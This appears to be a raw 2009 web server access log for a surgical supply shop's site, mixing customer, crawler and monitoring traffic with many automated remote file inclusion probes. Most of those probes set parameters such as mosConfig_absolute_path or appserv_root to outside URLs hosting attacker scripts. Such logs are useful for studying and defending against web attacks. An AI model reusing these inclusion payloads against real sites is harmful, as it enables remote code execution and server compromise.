204.208.240.55 - - [04/Sep/2009:03:26:03 -0400] "GET /images/items/0034020_THUMB.JPG HTTP/1.0" 200 2494 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:26:03 -0400] "GET /images/space.gif HTTP/1.0" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
78.47.128.166 - - [04/Sep/2009:03:26:06 -0400] "GET /logs/access_log.Q109080800//skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:03:26:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.208.240.55 - - [04/Sep/2009:03:26:19 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L011B6D4F1957E00034C5031+WSEQ(S0060):1+OUITEM(A0200):0034020 HTTP/1.0" 200 27010 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:26:20 -0400] "GET /images/items/0034020_FULL.JPG HTTP/1.0" 200 14691 "http://www.aceonlinestore.com/cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L011B6D4F1957E00034C5031+WSEQ(S0060):1+OUITEM(A0200):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:26:24 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:26:24 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:26:32 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:26:38 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:26:39 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:26:41 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:03:26:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.186.64.229 - - [04/Sep/2009:03:27:32 -0400] "GET /index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 207 "-" "Mozilla/5.0"
195.186.64.229 - - [04/Sep/2009:03:27:32 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 212 "-" "Mozilla/5.0"
195.186.64.229 - - [04/Sep/2009:03:27:39 -0400] "GET /logs/access_log.Q109052800/index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 234 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:03:27:16 -0400] "GET /logs/access_log.Q109081900 HTTP/1.0" 200 4260094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.188 - - [04/Sep/2009:03:28:24 -0400] "GET /logs/error_log.Q109072300/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:28:25 -0400] "GET /logs/access_log.Q109072300/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
220.181.7.126 - - [04/Sep/2009:03:28:33 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
78.47.128.166 - - [04/Sep/2009:03:29:05 -0400] "GET /logs/access_log.Q109072400%20%20//skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:03:29:08 -0400] "GET /logs/access_log.Q109072400%20%20//skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:03:29:22 -0400] "GET /logs/access_log.Q109080800%20%20//skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:03:29:24 -0400] "GET /logs/access_log.Q109080800%20%20//skin/zero_vote/error.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:29:43 -0400] "GET /logs/error_log.Q109072200%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:03:31:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.201 - - [04/Sep/2009:03:31:44 -0400] "GET /images/ACE_Orderform.pdf HTTP/1.1" 200 31826 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.184.252.3 - - [04/Sep/2009:03:33:30 -0400] "GET /logs/access_log.Q109072900%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.146.39.200 - - [04/Sep/2009:03:36:03 -0400] "GET /logs/access_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://www.ambient-arts.co.uk/media/id.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.822"
82.146.39.200 - - [04/Sep/2009:03:36:03 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.ambient-arts.co.uk/media/id.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.822"
82.146.39.200 - - [04/Sep/2009:03:36:04 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.ambient-arts.co.uk/media/id.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.822"
209.59.12.99 - - [04/Sep/2009:03:36:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [04/Sep/2009:03:36:35 -0400] "GET /logs/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:36:35 -0400] "GET /logs/error_log.Q109061900/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:36:35 -0400] "GET /appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
82.146.39.200 - - [04/Sep/2009:03:37:07 -0400] "GET /logs/error_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://www.ambient-arts.co.uk/media/id.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.822"
72.11.145.8 - - [04/Sep/2009:03:38:13 -0400] "GET /appserv/main.php?appserv_root=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:38:13 -0400] "GET /logs/error_log.Q109061900/appserv/main.php?appserv_root=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:38:13 -0400] "GET /logs/appserv/main.php?appserv_root=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:38:15 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:38:16 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:38:31 -0400] "GET /logs/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:38:31 -0400] "GET /appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:38:31 -0400] "GET /logs/error_log.Q109061900/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:38:35 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
74.6.22.87 - - [04/Sep/2009:03:38:23 -0400] "GET /logs/error_log.Q109081500 HTTP/1.0" 200 4212655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.89.135 - - [04/Sep/2009:03:40:34 -0400] "GET /modules/errors.php?error=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:03:40:34 -0400] "GET /logs/modules/errors.php?error=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:03:41:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.107.163.230 - - [04/Sep/2009:03:42:11 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:03:42:12 -0400] "GET /logs/access_log.Q109080500/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:03:42:12 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:03:42:15 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
79.189.190.100 - - [04/Sep/2009:03:42:29 -0400] "GET /modules/errors.php?error=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 216 "-" "Mozilla/5.0"
79.189.190.100 - - [04/Sep/2009:03:42:29 -0400] "GET /logs/modules/errors.php?error=http://www.rainbow.by//data/id1.txt??? HTTP/1.0" 404 221 "-" "Mozilla/5.0"
212.98.171.91 - - [04/Sep/2009:03:43:21 -0400] "GET /modules/errors.php?error=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
212.98.171.91 - - [04/Sep/2009:03:43:21 -0400] "GET /logs/modules/errors.php?error=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:03:43:59 -0400] "GET /logs/access_log.Q109080500%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:03:43:59 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
72.11.145.8 - - [04/Sep/2009:03:45:24 -0400] "GET /appserv/main.php?appserv_root=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:45:24 -0400] "GET /logs/appserv/main.php?appserv_root=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:45:24 -0400] "GET /logs/error_log.Q109050700%20/appserv/main.php?appserv_root=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:45:43 -0400] "GET /logs/error_log.Q109050700%20/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:45:43 -0400] "GET /logs/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:45:43 -0400] "GET /appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
125.141.196.8 - - [04/Sep/2009:03:46:24 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
125.141.196.8 - - [04/Sep/2009:03:46:24 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:03:46:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.115.89.97 - - [04/Sep/2009:03:46:30 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:46:30 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:46:30 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
125.141.196.8 - - [04/Sep/2009:03:46:34 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:47:06 -0400] "GET /logs/access_log.Q109072000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
125.141.196.8 - - [04/Sep/2009:03:47:55 -0400] "GET /logs/error_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
220.231.126.252 - - [04/Sep/2009:03:48:18 -0400] "GET //admin.color.php?mosConfig_live_site=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
220.231.126.252 - - [04/Sep/2009:03:48:18 -0400] "GET /logs/access_log.Q109070700//admin.color.php?mosConfig_live_site=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
220.231.126.252 - - [04/Sep/2009:03:48:18 -0400] "GET /logs//admin.color.php?mosConfig_live_site=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
83.149.110.216 - - [04/Sep/2009:03:48:49 -0400] "GET /logs/error_log.Q109080500//?_SERVER[DOCUMENT_ROOT]=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
83.149.110.216 - - [04/Sep/2009:03:48:49 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
83.149.110.216 - - [04/Sep/2009:03:48:49 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 200 16431 "-" "libwww-perl/5.805"
83.149.110.216 - - [04/Sep/2009:03:49:13 -0400] "GET /logs/access_log.Q109080500//?_SERVER[DOCUMENT_ROOT]=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
218.38.136.251 - - [04/Sep/2009:03:50:03 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:50:03 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:50:03 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:50:29 -0400] "GET /logs/access_log.Q109072000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
78.165.96.182 - - [04/Sep/2009:03:50:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
78.165.96.182 - - [04/Sep/2009:03:50:40 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
78.165.96.182 - - [04/Sep/2009:03:50:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
78.165.96.182 - - [04/Sep/2009:03:50:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
222.236.47.23 - - [04/Sep/2009:03:50:42 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:50:42 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:50:42 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.11.145.8 - - [04/Sep/2009:03:50:52 -0400] "GET /logs/error_log.Q109050700/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:51:01 -0400] "GET /logs/access_log.Q109050700/appserv/main.php?appserv_root=http://muvz.sytes.net/naked.jpg?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
211.115.89.97 - - [04/Sep/2009:03:51:06 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:51:06 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:51:06 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:51:13 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:51:13 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:51:13 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.47.23 - - [04/Sep/2009:03:51:17 -0400] "GET /logs/access_log.Q109072000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:03:51:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [04/Sep/2009:03:51:31 -0400] "GET /logs/access_log.Q109050700/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
211.115.89.97 - - [04/Sep/2009:03:51:33 -0400] "GET /logs/access_log.Q109072000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:51:33 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:51:33 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:51:33 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.11.145.8 - - [04/Sep/2009:03:51:36 -0400] "GET /logs/access_log.Q109050700/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:51:36 -0400] "GET /appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
72.11.145.8 - - [04/Sep/2009:03:51:37 -0400] "GET /logs/appserv/main.php?appserv_root=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
211.115.89.97 - - [04/Sep/2009:03:51:43 -0400] "GET /logs/access_log.Q109072000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.115.89.97 - - [04/Sep/2009:03:52:02 -0400] "GET /logs/access_log.Q109072000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
140.99.35.218 - - [04/Sep/2009:03:52:11 -0400] "GET /logs/error_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:52:18 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:52:18 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:52:18 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:52:59 -0400] "GET /logs/access_log.Q109072000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
220.231.126.252 - - [04/Sep/2009:03:53:02 -0400] "GET /logs/access_log.Q108122700//admin.color.php?mosConfig_live_site=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
